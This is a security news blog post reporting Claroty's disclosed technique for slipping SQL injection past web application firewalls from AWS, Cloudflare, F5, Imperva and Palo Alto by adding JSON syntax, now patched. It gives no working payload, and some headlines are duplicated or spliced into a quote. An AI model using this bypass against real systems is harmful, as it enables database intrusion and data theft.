Press "Enter" to skip to content

Researchers Detail New Attack Method to Bypass Popular WebApp Firewalls

Researchers Detail New Attack Method to Bypass Popular WebApp Firewalls

Researchers Detail New Attack Method to Bypass Popular WebApp Firewalls

A new attack method can be used to circumvent web application firewalls (WAFs) of various vendors and infiltrate systems, potentially enabling attackers to gain access to sensitive business and customer information.

In order to filter, monitor, and block HTTP(S) traffic to and from a web application and defend against attacks like cross-site scripting (XSS), file inclusion, and SQL injection, web application firewalls are an essential line of defense.

ALSO, READ How Hackers Are Exploiting Stolen Cookies To Attack Corporate Organisations – Research

The generic bypass “involves appending JSON syntax to SQL injection payloads that a WAF is unable to parse,” Claroty researcher Noam Moshe said. “Most WAFs will easily How Hackers Are Exploiting Stolen Cookies To Attack Corporate Organisations – Researchdetect SQLi attacks, but prepending JSON to SQL syntax left the WAF blind to these attacks.”

Researchers Detail New Attack Method to Bypass Popular WebApp Firewalls

The industrial and IoT cybersecurity company said its technique successfully worked against WAFs from vendors like Amazon Web Services (AWS), Cloudflare, F5, Imperva, and Palo Alto Networks, all of whom have since released updates to support JSON syntax during SQL injection inspection.

ALSO, READ Researchers Uncover Stealthy Techniques Used By Cranefly Espionage Hackers

Web Application Firewalls

With WAFs acting as a security guardrail against malicious external HTTP(S) traffic, an attacker with capabilities to get past the barrier can obtain initial access to a target environment for further post-exploitation.

ALSO, READ Microsoft Recently Releases Fix for Zero-Day Flaw (July 2022 Edition) Security Patch Rollout

The bypass mechanism devised by Claroty banks on the lack of JSON support for WAFs to craft rogue SQL injection payloads that include JSON syntax to skirt the protections.

Researchers Detail New Attack Method to Bypass Popular WebApp Firewalls

“Attackers using this novel technique could access a backend database and use additional vulnerabilities and exploits to exfiltrate information via either direct access to the server or over the cloud,” Moshe explained. “This is a dangerous bypass, especially as more organizations continue to migrate more business and functionality to the cloud.”


CYBERINFORMER.NET –  brings updates on the latest cyber security tips, online safety tips and cyber information, cyber security courses for Nigerians and Foreigners, Cyber security jobs for seekers and much more

If You find This article helpful please comment, subscribe and share

Be First to Comment

Leave a Reply

Mission News Theme by Compete Themes.
%d bloggers like this: